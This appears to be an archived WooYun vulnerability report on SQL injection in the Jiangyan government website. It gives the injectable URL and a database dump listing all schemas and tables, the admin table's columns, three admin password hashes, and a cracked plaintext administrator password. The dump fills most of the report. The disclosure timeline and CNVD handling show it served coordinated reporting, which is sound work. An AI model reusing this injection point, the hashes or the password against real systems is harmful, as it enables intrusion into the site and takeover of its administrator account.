乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-03: 细节已通知厂商并且等待厂商处理中 2015-08-06: 厂商已经确认,细节仅向厂商公开 2015-08-16: 细节向核心白帽子及相关领域专家公开 2015-08-26: 细节向普通白帽子公开 2015-09-05: 细节向实习白帽子公开 2015-09-20: 细节向公众公开
RT
中国姜堰政府网站SQL注入漏洞注入地址:http://www.jys.gov.cn/public/js/count.php?i=262648
| pw_config || pw_creditlog || pw_credits || pw_customfield || pw_cwritedata || pw_datanalyse || pw_datastate || pw_datastore || pw_debatedata || pw_debates || pw_diary || pw_diarytype || pw_draft || pw_elements || pw_extragroups || pw_favors || pw_feed || pw_filter || pw_filter_class || pw_filter_dictionary || pw_focus || pw_forumdata || pw_forumlog || pw_forummsg || pw_forums || pw_forumsell || pw_forumsextra || pw_forumtype || pw_friends || pw_friendtype || pw_group_replay || pw_hack || pw_help || pw_invitecode || pw_inviterecord || pw_invoke || pw_invokepiece || pw_ipstates || pw_job || pw_jober || pw_medalinfo || pw_medalslogs || pw_medaluser || pw_membercredit || pw_memberdata || pw_memberinfo || pw_members || pw_memo || pw_modehot || pw_modules || pw_mpageconfig || pw_ms_attachs || pw_ms_configs || pw_ms_messages || pw_ms_relations || pw_ms_replies || pw_ms_searchs || pw_ms_tasks || pw_msg || pw_msgc || pw_msglog || pw_nav || pw_oboard || pw_online || pw_ouserdata || pw_overprint || pw_owritedata || pw_pagecache || pw_pageinvoke || pw_pcfield || pw_pcmember || pw_pcvalue1 || pw_pcvalue2 || pw_permission || pw_pidtmp || pw_pinglog || pw_plan || pw_polls || pw_postcate || pw_posts || pw_postsfloor || pw_poststopped || pw_privacy || pw_proclock || pw_pushdata || pw_pushpic || pw_rate || pw_rateconfig || pw_rateresult || pw_recycle || pw_report || pw_reward || pw_schcache || pw_setform || pw_share || pw_sharelinks || pw_singleright || pw_smiles || pw_space || pw_sqlcv || pw_stamp || pw_stopic || pw_stopicblock || pw_stopiccategory || pw_stopicpictures || pw_stopicunit || pw_styles || pw_tagdata || pw_tags || pw_task || pw_threads || pw_tmsgs || pw_toollog || pw_tools || pw_topiccate || pw_topicfield || pw_topicmodel || pw_topictype || pw_topicvalue1 || pw_topicvalue2 || pw_topicvalue3 || pw_topicvalue4 || pw_topicvalue5 || pw_topicvalue6 || pw_topicvalue7 || pw_topicvalue8 || pw_tpl || pw_tpltype || pw_trade || pw_tradeorder || pw_ucapp || pw_ucnotify || pw_ucsyncredit || pw_userapp || pw_userbinding || pw_usercache || pw_usergroups || pw_usertool || pw_voter || pw_weibo_cmrelations || pw_weibo_cnrelations || pw_weibo_comment || pw_weibo_content || pw_weibo_referto || pw_weibo_relations || pw_windcode || pw_wordfb || pw_write_smiles |+---------------------------------------+Database: jiangyan[25 tables]+---------------------------------------+| bungmi_access || bungmi_admin || bungmi_answer || bungmi_answer_result || bungmi_article || bungmi_auth || bungmi_category || bungmi_config || bungmi_exam || bungmi_file || bungmi_group || bungmi_links || bungmi_page || bungmi_part || bungmi_partcode || bungmi_partdown || bungmi_participants || bungmi_partimage || bungmi_partlink || bungmi_parttext || bungmi_partvideo || bungmi_photo || bungmi_question || bungmi_question_item || bungmi_video |+---------------------------------------+Database: loyaa3[46 tables]+---------------------------------------+| department || department2 || department_sort || functionlibrary || module_info || myzqk || news_category || news_collection || news_detail || news_extend || news_image || news_keyword || news_special || news_statistics || news_table || news_task || news_title || sub_client || sub_fee || sub_templates || system || templates_info || templates_team || tmp_click || upgrade || user_info || user_team || yz_ask_answer || yz_chat || yz_event || yz_exam || yz_gcxm_dw || yz_gcxm_gc || yz_gcxm_pj || yz_gcxm_ry || yz_gp_data || yz_gp_family || yz_guestbook || yz_information_publish || yz_mobile || yz_subscribe || yz_survey_data || yz_survey_module || yz_tmp_dc1 || yz_vote || yz_vote_data |+---------------------------------------+Database: old_jys_web[10 tables]+---------------------------------------+| admin || diary || dospoll || info_cat || infos || no1 || ospoll || poll || spoll || zp |+---------------------------------------+Database: information_schema[28 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || KEY_COLUMN_USAGE || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+Database: jys_gov_cn[10 tables]+---------------------------------------+| admin || diary || dospoll || info_cat || infos || no1 || ospoll || poll || spoll || zp |+---------------------------------------+
Database: jys_gov_cnTable: admin[8 columns]+---------------+------------------+| Column | Type |+---------------+------------------+| admin_caption | varchar(150) || admin_id | int(11) unsigned || admin_name | varchar(50) || admin_pass | varchar(32) || admin_time | datetime || admin_type | char(1) || admin_user | varchar(32) || author_id | int(11) unsigned |+---------------+------------------+
Database: jys_gov_cnTable: admin[3 entries]+----------------------------------+---------------+| admin_pass | admin_name |+----------------------------------+---------------+| fb17403e1929d90c362c1f00e03299ca | <blank> || 4be185d60d63a3965347267f813f30d7 | <blank> || 187f1568e64af66c5da1dea0d2cf6ca1 | administrator |+----------------------------------+---------------+
md5解密后为:jydzzw_16
你懂得
危害等级:高
漏洞Rank:10
确认时间:2015-08-06 10:22
CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。
暂无